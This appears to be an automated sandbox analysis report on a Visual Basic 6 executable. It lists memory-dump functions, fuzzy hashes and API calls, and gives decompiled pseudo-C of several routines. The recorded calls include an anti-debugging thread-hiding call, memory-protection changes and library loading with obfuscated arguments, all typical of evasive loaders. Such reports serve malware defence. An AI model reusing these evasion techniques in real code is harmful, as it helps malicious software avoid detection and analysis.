                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 7944cd159f944f43e2a8164d0eeb655e4838f1ec5eba7ba0123855663fdbb86d
                                                        • Instruction ID: ba23bcfd22ded9caf07c4db6cbb80c3b41b76103396b17d86083450afb3f8394
                                                        • Opcode Fuzzy Hash: 7944cd159f944f43e2a8164d0eeb655e4838f1ec5eba7ba0123855663fdbb86d
                                                        • Instruction Fuzzy Hash: 7AE10871740B03FFEF149E28CCA0BE7B3AABF16750F444229EC9993641D725A895CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 02396E41: LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,023908D5,00000000,00000000,00000000,00000000), ref: 02390968
                                                          • Part of subcall function 02399264: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,02398C63,00000040,023908D5,00000000,00000000,00000000,00000000,?,00000000,00000000,02397003), ref: 0239927F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationLibraryLoadMemoryProtectThreadVirtual
                                                        • String ID:
                                                        • API String ID: 449006233-0
                                                        • Opcode ID: 0bc3ce0ebeb140bf943569e3635a4f67f76f30655da015b000f956dece8e40b4
                                                        • Instruction ID: 38e3798105075a2402e91879f4db9c16b3c45a585b43a3105c8bb496e550eb64
                                                        • Opcode Fuzzy Hash: 0bc3ce0ebeb140bf943569e3635a4f67f76f30655da015b000f956dece8e40b4
                                                        • Instruction Fuzzy Hash: 43610A71908342CECF359F28C5D47A5BB96AF93370F58829AD9938B6D7C3318486CB12
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 02396E41: LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,023908D5,00000000,00000000,00000000,00000000), ref: 02390968
                                                          • Part of subcall function 02399264: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,02398C63,00000040,023908D5,00000000,00000000,00000000,00000000,?,00000000,00000000,02397003), ref: 0239927F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationLibraryLoadMemoryProtectThreadVirtual
                                                        • String ID:
                                                        • API String ID: 449006233-0
                                                        • Opcode ID: fb9928bf1b2e27db19cf0ac7e14fa4034239ae00af3e982100586248d704743d
                                                        • Instruction ID: a67a705a0e4d7431c5027ca87a2ef0ec71d65ea43b0402376f086c1e5a09da78
                                                        • Opcode Fuzzy Hash: fb9928bf1b2e27db19cf0ac7e14fa4034239ae00af3e982100586248d704743d
                                                        • Instruction Fuzzy Hash: C0510771908342CECF359F28C5947A5BB96AF93270F58829AD9938B6D7C3718486CB12
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,023908D5,00000000,00000000,00000000,00000000), ref: 02390968
                                                        • LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                          • Part of subcall function 02399264: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,02398C63,00000040,023908D5,00000000,00000000,00000000,00000000,?,00000000,00000000,02397003), ref: 0239927F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationLibraryLoadMemoryProtectThreadVirtual
                                                        • String ID:
                                                        • API String ID: 449006233-0
                                                        • Opcode ID: 388fa61b61bad496bbcb4f84cc4526106e3b138727760788a8bb8e0d7015160d
                                                        • Instruction ID: 0fce5bc8f493d0aa6adabdbc302c5394a23fdeee508dc371df3657e89a263494
                                                        • Opcode Fuzzy Hash: 388fa61b61bad496bbcb4f84cc4526106e3b138727760788a8bb8e0d7015160d
                                                        • Instruction Fuzzy Hash: E2510971908341CECF318F28D8D47A5BB96AF53270F59829AD5928B6D7C3708486CB12
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,023908D5,00000000,00000000,00000000,00000000), ref: 02390968
                                                        • LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                          • Part of subcall function 02399264: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,02398C63,00000040,023908D5,00000000,00000000,00000000,00000000,?,00000000,00000000,02397003), ref: 0239927F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationLibraryLoadMemoryProtectThreadVirtual
                                                        • String ID:
                                                        • API String ID: 449006233-0
                                                        • Opcode ID: 303bf4a4c3c14855e924e98ea3ac0b64b5e89a5e8b8944824016709ea4ed3d78
                                                        • Instruction ID: bf209710b8407f390dede869546856a4a848f5d8d6e994e36938f9b2e70bd82b
                                                        • Opcode Fuzzy Hash: 303bf4a4c3c14855e924e98ea3ac0b64b5e89a5e8b8944824016709ea4ed3d78
                                                        • Instruction Fuzzy Hash: 72510871904341CECF318F28D8E47A5BB969F53270F5982AAD5928F6D7C3718482CB12
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 644477e01319e62f7c1f88e0d902422f403b03e11b2ad2c4685905df8b02a335
                                                        • Instruction ID: 9254ae7752ddff8693d546f9c3b2d8f26af968c43603307d0a73a6c6af30bd58
                                                        • Opcode Fuzzy Hash: 644477e01319e62f7c1f88e0d902422f403b03e11b2ad2c4685905df8b02a335
                                                        • Instruction Fuzzy Hash: C95109719043818ECF358F28D8D47A5BB969F53230F5882DAD5928F6D7C3718482C712
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f6b264853ca8b8c9e456b2e7b98b8437f20fd550e2c121484fb02f7f2f0695f2
                                                        • Instruction ID: 8675a365e2a748164780b6ec43da30060f2d2c52fc64f24a465c2e0423c55e29
                                                        • Opcode Fuzzy Hash: f6b264853ca8b8c9e456b2e7b98b8437f20fd550e2c121484fb02f7f2f0695f2
                                                        • Instruction Fuzzy Hash: 3C412B75744A02BFDF289E288C90BE773AABF16760F54422AEC99D3641DB11D885CB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 863697202a2a8009ad624fa02c0da8ee25d31a9bda9cadba8e4d11b66f693f8c
                                                        • Instruction ID: e806a62b283600c85744710ed12f7dca759b34fcde96566b896eba7e7e05496e
                                                        • Opcode Fuzzy Hash: 863697202a2a8009ad624fa02c0da8ee25d31a9bda9cadba8e4d11b66f693f8c
                                                        • Instruction Fuzzy Hash: F3315870784705EEFF356E148DE4BE63356AF03714F988069EE869B1D2D760C885CA12
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,023908D5,00000000,00000000,00000000,00000000), ref: 02390968
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationThread
                                                        • String ID:
                                                        • API String ID: 4046476035-0
                                                        • Opcode ID: e27450db8d516bf883aa3eb2e537c5bf8969db19257e3fd0e6fd8c81b711ebe5
                                                        • Instruction ID: 3894c408011a250dc8589cbe7f6b47a7c3c7fa3171186a2d430a776b0ca783be
                                                        • Opcode Fuzzy Hash: e27450db8d516bf883aa3eb2e537c5bf8969db19257e3fd0e6fd8c81b711ebe5
                                                        • Instruction Fuzzy Hash: 05216870784305EEFF356E144DD4BE6335AAF07314F948065EE869B0D2D7A0C886CA12
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7fe0eacfd117e31998b8531c418138dc6fd6d849c821200786851e5a61407a9a
                                                        • Instruction ID: 5b0fa3350e439e6d3993ffe4ce2ee7981629d6e6bce1770527d7efdb2ff3d582
                                                        • Opcode Fuzzy Hash: 7fe0eacfd117e31998b8531c418138dc6fd6d849c821200786851e5a61407a9a
                                                        • Instruction Fuzzy Hash: 79C04CBB650581DBEF12DA89E891BD47365F725A44FC504D1F103AF656E215ED41CA00
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 22bec2a47e8a69cf26464b0e731a52b1a0c01efefa56e74a65037f4241a12859
                                                        • Instruction ID: 82eb5c67f2b94f266c3a12389c1191b3308af56f8e0f22c465c7a2558b2339ee
                                                        • Opcode Fuzzy Hash: 22bec2a47e8a69cf26464b0e731a52b1a0c01efefa56e74a65037f4241a12859
                                                        • Instruction Fuzzy Hash: BAC04C31252640CFCF45CA0ED3D1A5173ADAB56650F055491A81287F26C754D804CD00
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 714467281263e38b168d49f53dff885bab39f58d86784bdb02f189f872327e2a
                                                        • Instruction ID: 406f4fa0b0725f4eac96311ad4c4841a475d5c0805a0bd1bc00f332faa5178ac
                                                        • Opcode Fuzzy Hash: 714467281263e38b168d49f53dff885bab39f58d86784bdb02f189f872327e2a
                                                        • Instruction Fuzzy Hash: 1FC04C31311640CBCA85CA4AD3D1B4173A9AB55650F155490E81187B21C355D804C900
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 51%
                                                        			E00411121(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a28) {
                                                        				intOrPtr _v8;
                                                        				intOrPtr _v12;
                                                        				void* _v28;
                                                        				void* _v32;
                                                        				void* _v36;
                                                        				char _v40;
                                                        				void* _v44;
                                                        				signed int _v48;
                                                        				intOrPtr* _v52;
                                                        				signed int _v56;
                                                        				char _v64;
                                                        				signed int _v68;
                                                        				signed int _v72;
                                                        				void* _t42;
                                                        				signed int _t43;
                                                        				signed int _t49;
                                                        				intOrPtr _t70;
                                                        
                                                        				_push(0x401216);
                                                        				_push( *[fs:0x0]);
                                                        				 *[fs:0x0] = _t70;
                                                        				_t42 = 0x34;
                                                        				L00401210();
                                                        				_v12 = _t70;
                                                        				_v8 = 0x4011c8;
                                                        				L0040130C();
                                                        				_push(0);
                                                        				_push(0xffffffff);
                                                        				_push(0x404a90);
                                                        				_push(0x404a84);
                                                        				_push(0x404a90);
                                                        				L004012B8();
                                                        				L004012D6();
                                                        				_push(_t42);
                                                        				L004012AC();
                                                        				_v44 =  ~(0 | _t42 != 0x00000003);
                                                        				L00401306();
                                                        				_t43 = _v44;
                                                        				if(_t43 != 0) {
                                                        					if( *0x41233c != 0) {
                                                        						_v64 = 0x41233c;
                                                        					} else {
                                                        						_push(0x41233c);
                                                        						_push(0x40470c);
                                                        						L00401330();
                                                        						_v64 = 0x41233c;
                                                        					}
                                                        					_t13 =  &_v64; // 0x41233c
                                                        					_v44 =  *((intOrPtr*)( *_t13));
                                                        					_t49 =  *((intOrPtr*)( *_v44 + 0x1c))(_v44,  &_v36);
                                                        					asm("fclex");
                                                        					_v48 = _t49;
                                                        					if(_v48 >= 0) {
                                                        						_v68 = _v68 & 0x00000000;
                                                        					} else {
                                                        						_push(0x1c);
                                                        						_push(0x4046fc);
                                                        						_push(_v44);
                                                        						_push(_v48);
                                                        						L0040131E();
                                                        						_v68 = _t49;
                                                        					}
                                                        					_v52 = _v36;
                                                        					_t43 =  *((intOrPtr*)( *_v52 + 0x64))(_v52, 1,  &_v40);
                                                        					asm("fclex");
                                                        					_v56 = _t43;
                                                        					if(_v56 >= 0) {
                                                        						_v72 = _v72 & 0x00000000;
                                                        					} else {
                                                        						_push(0x64);
                                                        						_push(0x404a70);
                                                        						_push(_v52);
                                                        						_push(_v56);
                                                        						L0040131E();
                                                        						_v72 = _t43;
                                                        					}
                                                        					L00401318();
                                                        				}
                                                        				asm("wait");
                                                        				_push(0x41126f);
                                                        				L00401306();
                                                        				return _t43;
                                                        			}




















                                                        0x00411126
                                                        0x00411131
                                                        0x00411132
                                                        0x0041113b
                                                        0x0041113c
                                                        0x00411144
                                                        0x00411147
                                                        0x00411154
                                                        0x00411159
                                                        0x0041115b
                                                        0x0041115d
                                                        0x00411162
                                                        0x00411167
                                                        0x0041116c
                                                        0x00411176
                                                        0x0041117b
                                                        0x0041117c
                                                        0x0041118b
                                                        0x00411192
                                                        0x00411197
                                                        0x0041119d
                                                        0x004111aa
                                                        0x004111c4
                                                        0x004111ac
                                                        0x004111ac
                                                        0x004111b1
                                                        0x004111b6
                                                        0x004111bb
                                                        0x004111bb
                                                        0x004111cb
                                                        0x004111d0
                                                        0x004111df
                                                        0x004111e2
                                                        0x004111e4
                                                        0x004111eb
                                                        0x00411204
                                                        0x004111ed
                                                        0x004111ed
                                                        0x004111ef
                                                        0x004111f4
                                                        0x004111f7
                                                        0x004111fa
                                                        0x004111ff
                                                        0x004111ff
                                                        0x0041120b
                                                        0x0041121c
                                                        0x0041121f
                                                        0x00411221
                                                        0x00411228
                                                        0x00411241
                                                        0x0041122a
                                                        0x0041122a
                                                        0x0041122c
                                                        0x00411231
                                                        0x00411234
                                                        0x00411237
                                                        0x0041123c
                                                        0x0041123c
                                                        0x00411248
                                                        0x00411248
                                                        0x0041124d
                                                        0x0041124e
                                                        0x00411269
                                                        0x0041126e

                                                        APIs
                                                        • __vbaChkstk.MSVBVM60(?,00401216), ref: 0041113C
                                                        • __vbaStrCopy.MSVBVM60(?,?,?,?,00401216), ref: 00411154
                                                        • __vbaStrCat.MSVBVM60(00404A90,00404A84,00404A90,000000FF,00000000,?,?,?,?,00401216), ref: 0041116C
                                                        • __vbaStrMove.MSVBVM60(00404A90,00404A84,00404A90,000000FF,00000000,?,?,?,?,00401216), ref: 00411176
                                                        • #709.MSVBVM60(00000000,00404A90,00404A84,00404A90,000000FF,00000000,?,?,?,?,00401216), ref: 0041117C
                                                        • __vbaFreeStr.MSVBVM60(00000000,00404A90,00404A84,00404A90,000000FF,00000000,?,?,?,?,00401216), ref: 00411192
                                                        • __vbaNew2.MSVBVM60(0040470C,0041233C,00000000,00404A90,00404A84,00404A90,000000FF,00000000,?,?,?,?,00401216), ref: 004111B6
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004046FC,0000001C,?,?,00000000,00404A90,00404A84,00404A90,000000FF,00000000), ref: 004111FA
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404A70,00000064,?,?,00000000,00404A90,00404A84,00404A90,000000FF,00000000), ref: 00411237
                                                        • __vbaFreeObj.MSVBVM60(?,?,?,?,00000000,00404A90,00404A84,00404A90,000000FF,00000000,?,?,?,?,00401216), ref: 00411248
                                                        • __vbaFreeStr.MSVBVM60(0041126F,00000000,00404A90,00404A84,00404A90,000000FF,00000000,?,?,?,?,00401216), ref: 00411269
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247304234.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.247298815.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000000.00000002.247324366.0000000000412000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000000.00000002.247336514.0000000000414000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: __vba$Free$CheckHresult$#709ChkstkCopyMoveNew2
                                                        • String ID: <#A
                                                        • API String ID: 1155717335-1833091969
                                                        • Opcode ID: d27dc5964f2269483c83c2a9b7399468b515e9ae78a83df91505121d9dae10cc
                                                        • Instruction ID: 627081641be15c8a9a2fe851341b9221cd301dcaaff88955343c9046908fcf64
                                                        • Opcode Fuzzy Hash: d27dc5964f2269483c83c2a9b7399468b515e9ae78a83df91505121d9dae10cc
                                                        • Instruction Fuzzy Hash: 77311970A40208AFDB11EBA1D942FDEBBB4BF08714F10416AF601B61E1D7785981CB18
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 59%
                                                        			E00411344(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
                                                        				intOrPtr _v8;
                                                        				intOrPtr _v12;
                                                        				intOrPtr _v16;
                                                        				void* _v28;
                                                        				intOrPtr _v36;
                                                        				char _v44;
                                                        				intOrPtr _v52;
                                                        				intOrPtr _v60;
                                                        				void* _v64;
                                                        				signed int _v68;
                                                        				intOrPtr* _v72;
                                                        				signed int _v76;
                                                        				char _v88;
                                                        				signed int _v92;
                                                        				signed int _v96;
                                                        				signed short _t49;
                                                        				signed int _t53;
                                                        				signed int _t59;
                                                        				void* _t71;
                                                        				void* _t73;
                                                        				intOrPtr _t74;
                                                        
                                                        				_t74 = _t73 - 0xc;
                                                        				 *[fs:0x0] = _t74;
                                                        				L00401210();
                                                        				_v16 = _t74;
                                                        				_v12 = 0x4011e8;
                                                        				_v8 = 0;
                                                        				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x48,  *[fs:0x0], 0x401216, _t71);
                                                        				_v36 = 0x4b05;
                                                        				_v44 = 2;
                                                        				_t49 =  &_v44;
                                                        				_push(_t49);
                                                        				L004012A6();
                                                        				asm("sbb eax, eax");
                                                        				_v64 =  ~( ~( ~_t49));
                                                        				L00401312();
                                                        				_t53 = _v64;
                                                        				if(_t53 != 0) {
                                                        					if( *0x41233c != 0) {
                                                        						_v88 = 0x41233c;
                                                        					} else {
                                                        						_push(0x41233c);
                                                        						_push(0x40470c);
                                                        						L00401330();
                                                        						_v88 = 0x41233c;
                                                        					}
                                                        					_t15 =  &_v88; // 0x41233c
                                                        					_v64 =  *((intOrPtr*)( *_t15));
                                                        					_t59 =  *((intOrPtr*)( *_v64 + 0x1c))(_v64,  &_v28);
                                                        					asm("fclex");
                                                        					_v68 = _t59;
                                                        					if(_v68 >= 0) {
                                                        						_v92 = _v92 & 0x00000000;
                                                        					} else {
                                                        						_push(0x1c);
                                                        						_push(0x4046fc);
                                                        						_push(_v64);
                                                        						_push(_v68);
                                                        						L0040131E();
                                                        						_v92 = _t59;
                                                        					}
                                                        					_v72 = _v28;
                                                        					_v52 = 0x80020004;
                                                        					_v60 = 0xa;
                                                        					L00401210();
                                                        					asm("movsd");
                                                        					asm("movsd");
                                                        					asm("movsd");
                                                        					asm("movsd");
                                                        					_t53 =  *((intOrPtr*)( *_v72 + 0x60))(_v72, L"zqzVIeGmnCH216", 0x10);
                                                        					asm("fclex");
                                                        					_v76 = _t53;
                                                        					if(_v76 >= 0) {
                                                        						_v96 = _v96 & 0x00000000;
                                                        					} else {
                                                        						_push(0x60);
                                                        						_push(0x404a70);
                                                        						_push(_v72);
                                                        						_push(_v76);
                                                        						L0040131E();
                                                        						_v96 = _t53;
                                                        					}
                                                        					L00401318();
                                                        				}
                                                        				_push(0x41149d);
                                                        				return _t53;
                                                        			}
























                                                        0x00411347
                                                        0x00411356
                                                        0x00411360
                                                        0x00411368
                                                        0x0041136b
                                                        0x00411372
                                                        0x00411381
                                                        0x00411384
                                                        0x0041138b
                                                        0x00411392
                                                        0x00411395
                                                        0x00411396
                                                        0x0041139e
                                                        0x004113a4
                                                        0x004113ab
                                                        0x004113b0
                                                        0x004113b6
                                                        0x004113c3
                                                        0x004113dd
                                                        0x004113c5
                                                        0x004113c5
                                                        0x004113ca
                                                        0x004113cf
                                                        0x004113d4
                                                        0x004113d4
                                                        0x004113e4
                                                        0x004113e9
                                                        0x004113f8
                                                        0x004113fb
                                                        0x004113fd
                                                        0x00411404
                                                        0x0041141d
                                                        0x00411406
                                                        0x00411406
                                                        0x00411408
                                                        0x0041140d
                                                        0x00411410
                                                        0x00411413
                                                        0x00411418
                                                        0x00411418
                                                        0x00411424
                                                        0x00411427
                                                        0x0041142e
                                                        0x00411438
                                                        0x00411442
                                                        0x00411443
                                                        0x00411444
                                                        0x00411445
                                                        0x00411453
                                                        0x00411456
                                                        0x00411458
                                                        0x0041145f
                                                        0x00411478
                                                        0x00411461
                                                        0x00411461
                                                        0x00411463
                                                        0x00411468
                                                        0x0041146b
                                                        0x0041146e
                                                        0x00411473
                                                        0x00411473
                                                        0x0041147f
                                                        0x0041147f
                                                        0x00411484
                                                        0x00000000

                                                        APIs
                                                        • __vbaChkstk.MSVBVM60(?,00401216), ref: 00411360
                                                        • #592.MSVBVM60(00000002), ref: 00411396
                                                        • __vbaFreeVar.MSVBVM60(00000002), ref: 004113AB
                                                        • __vbaNew2.MSVBVM60(0040470C,0041233C,00000002), ref: 004113CF
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004046FC,0000001C,?,?,?,?,?,?,?,?,?,?,00000002), ref: 00411413
                                                        • __vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00000002), ref: 00411438
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404A70,00000060,?,?,?,?,?,?,?,?,?,?,00000002), ref: 0041146E
                                                        • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00000002), ref: 0041147F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247304234.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.247298815.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000000.00000002.247324366.0000000000412000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000000.00000002.247336514.0000000000414000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: __vba$CheckChkstkFreeHresult$#592New2
                                                        • String ID: <#A$zqzVIeGmnCH216
                                                        • API String ID: 2263007462-381297742
                                                        • Opcode ID: 3b94d5a3c7f269797ca89ad7e712ad12207bad459b329cc38cdbc9afec7a7030
                                                        • Instruction ID: 7ba8beff96dce415bd7e963d2dd5e342cf714a19d21d9a2f9db778bcf99bc3da
                                                        • Opcode Fuzzy Hash: 3b94d5a3c7f269797ca89ad7e712ad12207bad459b329cc38cdbc9afec7a7030
                                                        • Instruction Fuzzy Hash: CC41E470D40208EFDB10EFE5D985BDEBBB4BF08704F10442AF501BB2A1C7B959959B58
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 50%
                                                        			E00410D3C(void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                                        				intOrPtr _v8;
                                                        				intOrPtr _v12;
                                                        				char _v32;
                                                        				void* _v36;
                                                        				intOrPtr* _v40;
                                                        				signed int _v44;
                                                        				intOrPtr* _v48;
                                                        				signed int _v52;
                                                        				short _v56;
                                                        				char _v64;
                                                        				signed int _v68;
                                                        				signed int _v72;
                                                        				signed int _t43;
                                                        				signed int _t48;
                                                        				short _t52;
                                                        				intOrPtr _t61;
                                                        
                                                        				_push(0x401216);
                                                        				_push( *[fs:0x0]);
                                                        				 *[fs:0x0] = _t61;
                                                        				_push(0x34);
                                                        				L00401210();
                                                        				_v12 = _t61;
                                                        				_v8 = 0x4011a0;
                                                        				if( *0x41233c != 0) {
                                                        					_v64 = 0x41233c;
                                                        				} else {
                                                        					_push(0x41233c);
                                                        					_push(0x40470c);
                                                        					L00401330();
                                                        					_v64 = 0x41233c;
                                                        				}
                                                        				_t5 =  &_v64; // 0x41233c
                                                        				_v40 =  *((intOrPtr*)( *_t5));
                                                        				_t43 =  *((intOrPtr*)( *_v40 + 0x14))(_v40,  &_v36);
                                                        				asm("fclex");
                                                        				_v44 = _t43;
                                                        				if(_v44 >= 0) {
                                                        					_v68 = _v68 & 0x00000000;
                                                        				} else {
                                                        					_push(0x14);
                                                        					_push(0x4046fc);
                                                        					_push(_v40);
                                                        					_push(_v44);
                                                        					L0040131E();
                                                        					_v68 = _t43;
                                                        				}
                                                        				_v48 = _v36;
                                                        				_t48 =  *((intOrPtr*)( *_v48 + 0x50))(_v48,  &_v32);
                                                        				asm("fclex");
                                                        				_v52 = _t48;
                                                        				if(_v52 >= 0) {
                                                        					_v72 = _v72 & 0x00000000;
                                                        				} else {
                                                        					_push(0x50);
                                                        					_push(0x4048c0);
                                                        					_push(_v48);
                                                        					_push(_v52);
                                                        					L0040131E();
                                                        					_v72 = _t48;
                                                        				}
                                                        				_push(_v32);
                                                        				_push(0);
                                                        				L004012DC();
                                                        				asm("sbb eax, eax");
                                                        				_v56 =  ~( ~_t48 + 1);
                                                        				L00401306();
                                                        				L00401318();
                                                        				_t52 = _v56;
                                                        				if(_t52 != 0) {
                                                        					L004012C4();
                                                        				}
                                                        				asm("wait");
                                                        				_push(0x410e55);
                                                        				return _t52;
                                                        			}



















                                                        0x00410d41
                                                        0x00410d4c
                                                        0x00410d4d
                                                        0x00410d54
                                                        0x00410d57
                                                        0x00410d5f
                                                        0x00410d62
                                                        0x00410d70
                                                        0x00410d8a
                                                        0x00410d72
                                                        0x00410d72
                                                        0x00410d77
                                                        0x00410d7c
                                                        0x00410d81
                                                        0x00410d81
                                                        0x00410d91
                                                        0x00410d96
                                                        0x00410da5
                                                        0x00410da8
                                                        0x00410daa
                                                        0x00410db1
                                                        0x00410dca
                                                        0x00410db3
                                                        0x00410db3
                                                        0x00410db5
                                                        0x00410dba
                                                        0x00410dbd
                                                        0x00410dc0
                                                        0x00410dc5
                                                        0x00410dc5
                                                        0x00410dd1
                                                        0x00410de0
                                                        0x00410de3
                                                        0x00410de5
                                                        0x00410dec
                                                        0x00410e05
                                                        0x00410dee
                                                        0x00410dee
                                                        0x00410df0
                                                        0x00410df5
                                                        0x00410df8
                                                        0x00410dfb
                                                        0x00410e00
                                                        0x00410e00
                                                        0x00410e09
                                                        0x00410e0c
                                                        0x00410e0e
                                                        0x00410e15
                                                        0x00410e1a
                                                        0x00410e21
                                                        0x00410e29
                                                        0x00410e2e
                                                        0x00410e34
                                                        0x00410e36
                                                        0x00410e36
                                                        0x00410e3b
                                                        0x00410e3c
                                                        0x00000000

                                                        APIs
                                                        • __vbaChkstk.MSVBVM60(?,00401216), ref: 00410D57
                                                        • __vbaNew2.MSVBVM60(0040470C,0041233C,?,?,?,?,00401216), ref: 00410D7C
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004046FC,00000014), ref: 00410DC0
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004048C0,00000050), ref: 00410DFB
                                                        • __vbaStrCmp.MSVBVM60(00000000,?), ref: 00410E0E
                                                        • __vbaFreeStr.MSVBVM60(00000000,?), ref: 00410E21
                                                        • __vbaFreeObj.MSVBVM60(00000000,?), ref: 00410E29
                                                        • __vbaEnd.MSVBVM60(00000000,?), ref: 00410E36
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247304234.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.247298815.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000000.00000002.247324366.0000000000412000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000000.00000002.247336514.0000000000414000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: __vba$CheckFreeHresult$ChkstkNew2
                                                        • String ID: <#A
                                                        • API String ID: 304406766-1833091969
                                                        • Opcode ID: 75e45a3183b2907329e98f1ece8ba2cdf883f51a772ae8bbda9eb396501685da
                                                        • Instruction ID: 241986159f4569d493661f0bc02bcb2c705a0546a84561feb5f6a96b28ea1ff6
